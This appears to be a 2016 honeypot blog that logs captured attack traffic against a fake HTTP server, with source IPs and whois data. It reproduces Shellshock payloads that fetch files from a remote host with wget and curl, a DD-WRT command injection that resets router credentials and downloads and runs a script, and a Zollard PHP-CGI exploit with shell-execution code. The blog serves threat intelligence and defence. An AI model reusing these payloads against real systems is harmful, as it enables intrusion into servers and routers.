Good morning,
as you may have already found out, the posts on this blog have been getting less and less. This is caused by the fact that my two honeypots have had some issues.
The vservers will be going down soon. So no more analytics.
Thanks to Swen for having the Germany running for so long. I am currently looking for cheap vservers in the world and talks to some people about funding the operation costs, until than....
This is the end
SendMeSpam
Python written Honeypot. My own Honeypot, my own opinion, research and statements.
Freitag, 4. März 2016
Donnerstag, 11. Februar 2016
159.226.162.196 - #perl wget via 204.232.209.188
BEGIN OF HTTP DATA:
2016-02-11 19:15:33
Source IP: 159.226.162.196
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'
Host: 109.234.106.8
Connection: Close
END OF DATA
The http server returned 404 at the time of the investigation
Copyright (c) 2015,2016, Joerg Stephan
Disclaimer:This information is provided as-is and there is no guarantee |
159.226.162[.]196
204.232.209[.]188
|
Sonntag, 7. Februar 2016
178.57.115.231 - (Russian IPs) possible DD-WRT firmware via 178.57.115.231:8081
BEGIN OF HTTP DATA:
2016-02-06 15:33:59
Source IP: 178.57.115.231
GET /cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\set$IFS\http_username;nvram$IFS\commit;sleep$IFS ;cd$IFS\/tmp;wget$IFS\http:\/\/178.57.115.231:8081\/h\/wrt\/ug.sh;chmod$IFSÿ$IFS\/tmp/ug.sh;/bin/sh$IFS\/tmp/ug.sh HTTP/1.0
Host:195.169.125.87:8080
END OF DATA
The ug.sh tries to download an binary file
Just by taking a look of the xxd and strings output of the file, it looks like an DD-WRT firmware file.
Copyright (c) 2015,2016, Joerg Stephan
All rights reserved.
Disclaimer:This information is provided as-is and there is no guaranteethat blocking an IP or domain reported in this overview will not adversely
impact your business. Use all information provided on your own risk,
the author disclaims all warranty and shall not be liable for any damage
or impact caused.
178.57.115[.]231
- Whois Data (TeamCymru)
- AS : 60139
- IP : 178.57.115.231
- BGP Prefix : 178.57.112.0/21
- CC : RU
- Registry : ripencc
- Allocated : 2010-02-02
- AS Name: Z-TELECOM Z-Telecom Ltd,RU
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
178.57.115[.]231
- Whois Data (TeamCymru)
- AS : 60139
- IP : 178.57.115.231
- BGP Prefix : 178.57.112.0/21
- CC : RU
- Registry : ripencc
- Allocated : 2010-02-02
- AS Name: Z-TELECOM Z-Telecom Ltd,RU
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
Sonntag, 24. Januar 2016
61.49.45.47 - WhatWeb/0.4.8-dev (first time seen)
BEGIN OF HTTP DATA:For more information https://user-agents.me/crawler/whatweb048-dev
2016-01-23 16:47:13
Source IP: 61.49.45.47
GET / HTTP/1.1
User-Agent: WhatWeb/0.4.8-dev
Host: 109.234.106.8:8080
Connection: close
Accept: */*
According to some news in the web, this crawler is meant to identify the running webpages on a server.
61.49.45[.]47
- Whois Data (TeamCymru)
- AS : 4808
- IP : 61.49.45.47
- BGP Prefix : 61.49.0.0/18
- CC : CN
- Registry : apnic
- Allocated : 2001-06-28
- AS Name: CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network,CN
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
- Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- Reference: https://isc.sans.edu/api/ip/61.49.45.47
Donnerstag, 21. Januar 2016
213.136.72.84 . Shellshock perl via 204.232.209.188
BEGIN OF HTTP DATA:
2016-01-20 09:58:59
Source IP: 213.136.72.84
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'
Host: 195.169.125.87
Connection: Close
END OF DATA
213.136.72[.]84
204.232.209[.]188
|
92.45.197.218 - Zollard php execution
BEGIN OF HTTP DATA:Sadly the request was to long to be fully logged by the fake HTTP server
2016-01-21 09:47:25
Source IP: 92.45.197.218
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F
%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%6
9%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%
66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63
%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1817
Connection: close
<?php
echo "Zollard";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
}
function myshellexec($cmd)
{
global $disablefunc;
$result = "";
if (!empty($cmd))
{
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disabl
END OF DATA
The POST messages is
POST /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n HTTP/1.1
92.45.197[.]218
- Whois Data (TeamCymru)
- AS : 34984
- IP : 92.45.197.218
- BGP Prefix : 92.45.196.0/23
- CC : TR
- Registry : ripencc
- Allocated : 2007-12-17
- AS Name: TELLCOM-AS TELLCOM ILETISIM HIZMETLERI A.S.,TR
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
Mittwoch, 13. Januar 2016
Scanner seen on January 14, 2016
- 185.130.5.207 - muieblackcat
- 37.142.32.222 - masscan/1.0
- 149.78.19.136 - masscan/1.0
- 195.169.125.87 - zgrab/0.x
- 185.130.5.235 - muieblackcat
185.130.5[.]207
37.142.32[.]222
149.78.19[.]136
195.169.125[.]87
185.130.5[.]235
|
Abonnieren
Posts (Atom)